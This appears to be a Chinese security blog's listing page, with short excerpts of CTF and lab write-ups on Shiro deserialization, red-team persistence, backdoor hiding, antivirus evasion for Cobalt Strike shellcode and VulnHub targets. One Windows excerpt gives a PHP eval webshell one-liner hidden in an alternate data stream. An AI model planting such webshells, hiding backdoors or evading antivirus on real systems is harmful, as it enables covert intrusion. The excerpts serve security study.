rwctf_Old-shiro题解
Old-shiro题解 一、题目分析 访问如下: 注意到Remermber me同时考察的是Shiro,果断打✔尝试登录抓包。 发现关键字为rememberMe_rwctf_2024(反编译jar包也可以看到),看一下pom.xml依赖。 shiro 1.2.4是存在默认key的,验证一下: 同时注意到有cb1.9.2,直接爆破一下利用链吧。 果然“没”链子...
Old-shiro题解 一、题目分析 访问如下: 注意到Remermber me同时考察的是Shiro,果断打✔尝试登录抓包。 发现关键字为rememberMe_rwctf_2024(反编译jar包也可以看到),看一下pom.xml依赖。 shiro 1.2.4是存在默认key的,验证一下: 同时注意到有cb1.9.2,直接爆破一下利用链吧。 果然“没”链子...
ATK&CK红队评估实战靶场(一) 一、前言 ATK&CK红队评估实战靶场(一)下载地址 : http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真...
Windows权限维持-隐藏篇 利用ADS隐藏文件内容 在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞: echo ^<?php echo "success";@eval($_POST['R19ht']);?^> > index.php:R19ht.jpg 这样子就生成了一个不可见的shell R19ht.jpg,...
Linux篇-隐藏 隐藏文件 Linux 下创建一个隐藏文件:touch .test.txt 一般的Linux下的隐藏目录使用命令ls -l是查看不出来的,只能查看到文件及文件夹,查看Linux下的隐藏文件需要用到命令:ls -al 隐藏文件时间戳 Unix 下藏后门必须要修改时间,否则很容易被发现,直接利用 touch 就可以了。 比如参考 index.php 的时间,再赋给 ...
免杀生成器 简介 免杀exe版子基于c/c++开发,免杀生成器基于Qt开发。目前能够规避常见杀软的静态查杀 火绒:版本: 5.0.75.1 病毒库: 2023-12-28 18:18 360安全管家: 360杀毒: 使用简介 生成cs的bin格式的shellcode并导入到生成器 自定义加密shellcode(目前只支持CBC),输入iv和key 选择生...
CNVD-2023-96645 一、RCE漏洞 某公司WMS系统存在命令执行漏洞 二、危害等级 高,漏洞评分:10.0 三、漏洞类型 通用型漏洞(产品组件漏洞) 四、漏洞详情 该公司WMS系统中使用了shiro框架,由于其key泄露且可轻易获取而导致的shiro反序列化漏洞,利用该漏洞可实现任意命令执行。
AI-WEB-1 一、环境配置 更改网络适配器为NAT模式 二、主机探测 在物理机中查看VMnet8网卡 使用fscan探测AI-WEB-2靶机ip地址为:192.168.157.137 三、WEB信息收集 dirsearch -u http://192.168.157.137/ dirsearch -u http://192.168.157.137...
DC-1靶机 一、环境配置 更改网络适配器为NAT模式 二、主机探测 在物理机中查看VMnet8网卡 使用fscan探测DC-1靶机ip地址为:192.168.157.133 三、漏洞利用 同时扫描出目标可能存在drupal-cve-2014-3704-sqli,使用msf查看是否有利用模块 msf6 > search cve-2014-3704 ...
AI-WEB-2 一、环境配置 更改网络适配器为NAT模式 二、主机探测 在物理机中查看VMnet8网卡 使用fscan探测AI-WEB-2靶机ip地址为:192.168.157.134 三、WEB信息收集 dirsearch -u http://192.168.157.134/ 存在/webadmin目录,但是需要账号密码 四、任意文件读取 看到有...
WEB-Polar OA 一、查看题目信息 题目给出一个PolarOA统一身份认证系统的登录界面。 二、题目分析 在登录界面尝试登录并抓包查看信息,发现rememberMe的特征字符串,可猜测考察shiro反序列化的利用。 原理:Apache Shiro框架的记住密码功能,用户登录后生成加密编码的cookie。服务端对记住密码产生的cookie进行base64解密,再进行A...